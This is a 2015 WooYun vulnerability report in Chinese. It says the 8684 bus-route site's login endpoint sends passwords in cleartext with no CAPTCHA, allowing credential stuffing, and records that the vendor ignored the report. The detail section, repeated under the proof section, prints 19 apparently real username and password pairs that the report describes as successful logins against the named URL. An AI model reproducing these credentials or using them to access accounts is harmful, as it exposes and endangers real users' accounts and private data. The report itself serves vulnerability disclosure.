当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150405

漏洞标题:8684公交登陆口配置不当导致可撞库攻击

相关厂商:8684公交

漏洞作者: Azazel

提交时间:2015-10-30 11:08

修复时间:2015-11-04 11:10

公开时间:2015-11-04 11:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:19

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

8684公交一接口设计缺陷可撞库用户

详细说明:

http://passport.8684.com/8684/login_b_v2.php?ref=http%253A%252F%252Fpassport.8684.com%252F8684%252Fgetpwd.php&&f5=0&v=1446109308563这处登录的接口,抓包发现用户名密码都是明文的,然后也没发现验证码

1.png


测试撞库用户应该是可以的:

2.png


zllajj zllajj 1208
musicmh 511323 1236
lyjbenny 7512231 1237
bn922 123456 1239
caokangli 841127 1240
sxj588 6360588 1240
lhplee lhp875484 1240
ipwisk 73156711 1240
snrwcwt yangjun 1241
jeffow 456123 1241
kk1431 10160214 1242
lylyv 4661879879 1252
lingaoyun lingaoyun 1261
lxhuiok lxhuiok 1264
lyf2614 261433289 1264
luoxiao94 19861004 1266
ruixiang123 123456 1268
benief 335812999 1274
tzbr zj19890922 1419
登录帐号发现成功的:

3.png

漏洞证明:

http://passport.8684.com/8684/login_b_v2.php?ref=http%253A%252F%252Fpassport.8684.com%252F8684%252Fgetpwd.php&&f5=0&v=1446109308563这处登录的接口,抓包发现用户名密码都是明文的,然后也没发现验证码

1.png


测试撞库用户应该是可以的:

2.png


zllajj zllajj 1208
musicmh 511323 1236
lyjbenny 7512231 1237
bn922 123456 1239
caokangli 841127 1240
sxj588 6360588 1240
lhplee lhp875484 1240
ipwisk 73156711 1240
snrwcwt yangjun 1241
jeffow 456123 1241
kk1431 10160214 1242
lylyv 4661879879 1252
lingaoyun lingaoyun 1261
lxhuiok lxhuiok 1264
lyf2614 261433289 1264
luoxiao94 19861004 1266
ruixiang123 123456 1268
benief 335812999 1274
tzbr zj19890922 1419
登录帐号发现成功的:

3.png

修复方案:

加密

版权声明:转载请注明来源 Azazel@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-04 11:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无